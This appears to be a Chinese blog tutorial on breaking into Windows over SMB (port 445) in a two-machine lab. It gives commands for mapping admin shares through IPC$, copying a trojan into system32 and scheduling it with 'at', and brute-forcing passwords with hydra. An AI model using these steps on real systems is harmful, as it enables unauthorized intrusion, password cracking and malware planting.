Smb(445)暴力破解与利用(实操)
作者:@11阳光
本文为作者原创,转载请注明出处:https://www.cnblogs.com/sunny11/p/14076283.html
工具
xp一台,ip:192.168.40.122
win2003一台 , ip:192.168.0.116
一、小技巧。
探测端口开没开着,telnet ip 端口,跳出黑框代表开着了。平常用工具探测。
二、用xp链接2003的c$映射到xp的k盘。
net share 可以看到目标开启了哪些共享文件。
net use \\192.168.0.116\c$,然后输入目标的账号和密码,就能连接上了。可以当网盘使用。
这样就能把目标的共享资源映射到本地了,这里是分别映射了c$d$与share,为kjl盘。不知道为啥f盘不行。
三、取消盘符映射
net use 盘符 /del或者取消所有net use * /del
四、ipc$连接后可自由选择传文件到哪并执行。
1、net use \\192.168.0.116\ipc$
2、制作木马并植入木马copy d:\heihei.exe \\192.168.0.116\c$\windows\system32\ // 把本地d盘下的文件复制到目标的c盘\windows\system32\ 下。
3、定时上线:net time \\192.168.0.116 //查看目标机器的系统时间
at \\192.168.0.116 时间(例如16:49)"c: \windows\system32\heihei.exe"
at \\192.168.0.116查看待运行任务。
四、暴力破解目标账号密码
可用工具:NTscan,hydra
hydra.exe -l administrator -P e:\pass.txt 192.168.0.116 telnet //爆破密码
hydra.exe -l 账号 -P 密码本 ip 协议(ftp、smb)
hydra.exe -L 账号字典 -P 密码字典192.168.0.116 telnet
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 如何编写易于单元测试的代码
· 10年+ .NET Coder 心语,封装的思维:从隐藏、稳定开始理解其本质意义
· .NET Core 中如何实现缓存的预热?
· 从 HTTP 原因短语缺失研究 HTTP/2 和 HTTP/3 的设计差异
· AI与.NET技术实操系列:向量存储与相似性搜索在 .NET 中的实现
· 地球OL攻略 —— 某应届生求职总结
· 周边上新:园子的第一款马克杯温暖上架
· Open-Sora 2.0 重磅开源!
· 提示词工程——AI应用必不可少的技术
· .NET周刊【3月第1期 2025-03-02】